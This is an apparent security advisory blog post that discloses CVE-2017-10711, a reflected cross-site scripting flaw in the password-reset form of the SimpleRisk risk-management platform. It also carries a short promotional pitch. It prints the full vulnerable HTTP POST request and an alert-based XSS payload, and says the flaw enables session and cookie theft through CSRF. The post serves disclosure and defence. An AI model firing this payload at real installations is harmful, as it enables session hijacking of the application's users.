Hi Guys,
Today we will discuss about a basic hunt of a reflected cross site vulnerability in SimpleRisk platform but first lets know some general details about the platform itself
What is SimpleRisk?
SimpleRisk is an open-source risk management system released under Mozilla Public License and used for risk management activities. It enables risk managers to account for risks, plan mitigation measures, facilitate management reviews, prioritize for project planning, and track periodic reviews. SimpleRisk allows risk managers to prioritize enterprise responses according to the severity of threats and vulnerabilities that could impact the business.
SimpleRisk sports a dashboard for submitting a new risk for consideration by your team, for creating risk reports and graphs of risk levels and locations. Highly configurable, SimpleRisk report generation is dynamic; risk formulas could be tweaked on the fly.
Now let’s dive into the technical details:
The “user” field in SimpleRisk’s user password reset form is not properly sanitized/filtered against dangerous user input resulted in executing javascript in the context of the app hence Steal SimpleRisk users sessions, Perform actions on behalf of SimpleRisk users, Hijack Session Cookies, etc..
In the heart of reset.php file:
As you may notice in this commit the value of “user” input was echoed directly to the view without being filtered
Vulnerability Type:
Reflected Cross Site Scripting
More info:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Vulnerability Exploitation:
Through POST based CSRF
Version affected:
=> 20170614-001
Vulnerable Request:
POST /simplerisk/reset.php HTTP/1.1
Host: IP
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
user='”–> </style></script> <script> alert(document.domain)</script> &token=&password= &repeat_password= &password_reset=
Vulnerable Parameter:
User
Payload used:
‘”–></style></script><script>alert(document.domain)</script>
Proof of concept Video:
Advisory:
CVE-2017-10711
Hey!
Building a website, an application or any kind of business? Or already have one? Worried about your security? Think twice before going public and let us protect your business!
CVE-2017-10711 in. SimpleRisk Management Open Reflected Risk Source System Vulnerability XSS
Previous Next